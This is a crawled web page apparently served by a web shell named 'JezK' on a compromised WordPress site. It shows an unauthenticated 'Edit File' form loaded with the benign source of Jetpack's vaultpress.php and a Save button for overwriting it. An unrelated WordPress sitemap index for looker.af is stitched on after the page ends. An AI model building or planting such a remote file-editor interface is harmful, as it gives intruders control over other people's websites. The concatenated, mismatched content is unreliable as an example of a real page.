
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: vaultpress.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Handles VaultPress-&gt;Rewind transition by deactivating VaultPress when needed.
 *
 * @package automattic/jetpack
 */

use Automattic\Jetpack\Redirect;

/**
 * Notify user that VaultPress has been disabled. Hide VaultPress notice that requested attention.
 *
 * @since 5.8
 */
function jetpack_vaultpress_rewind_enabled_notice() {
	// The deactivation is performed here because there may be pages that admin_init runs on,
	// such as admin_ajax, that could deactivate the plugin without showing this notification.
	deactivate_plugins( &#039;vaultpress/vaultpress.php&#039; );

	// Remove WP core notice that says that the plugin was activated.
	unset( $_GET[&#039;activate&#039;] ); // phpcs:ignore WordPress.Security.NonceVerification
	?&gt;
	&lt;div class=&quot;notice notice-success is-dismissible vp-deactivated&quot;&gt;
		&lt;p style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;strong&gt;&lt;?php esc_html_e( &#039;Jetpack is now handling your backups.&#039;, &#039;jetpack&#039; ); ?&gt;&lt;/strong&gt;&lt;/p&gt;
		&lt;p&gt;
			&lt;?php esc_html_e( &#039;VaultPress is no longer needed and has been deactivated.&#039;, &#039;jetpack&#039; ); ?&gt;
			&lt;?php
				printf(
					wp_kses(
						/* Translators: first variable is the full URL to the new dashboard */
						__( &#039;You can access your backups at &lt;a href=&quot;%s&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;this dashboard&lt;/a&gt;.&#039;, &#039;jetpack&#039; ),
						array(
							&#039;a&#039; =&gt; array(
								&#039;href&#039;   =&gt; array(),
								&#039;target&#039; =&gt; array(),
								&#039;rel&#039;    =&gt; array(),
							),
						)
					),
					esc_url( Redirect::get_url( &#039;calypso-backups&#039; ) )
				);
			?&gt;
		&lt;/p&gt;
	&lt;/div&gt;
	&lt;style&gt;#vp-notice{display:none;}&lt;/style&gt;
	&lt;?php
}

/**
 * If Backup &amp; Scan is enabled, remove its entry in sidebar, deactivate VaultPress, and show a notification.
 *
 * @since 5.8
 */
function jetpack_vaultpress_rewind_check() {
	if (
		Jetpack::is_connection_ready() &amp;&amp;
		Jetpack::is_plugin_active( &#039;vaultpress/vaultpress.php&#039; ) &amp;&amp;
		Jetpack::is_rewind_enabled()
	) {
		remove_submenu_page( &#039;jetpack&#039;, &#039;vaultpress&#039; );

		add_action( &#039;admin_notices&#039;, &#039;jetpack_vaultpress_rewind_enabled_notice&#039; );
	}
}

add_action( &#039;admin_init&#039;, &#039;jetpack_vaultpress_rewind_check&#039;, 11 );
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
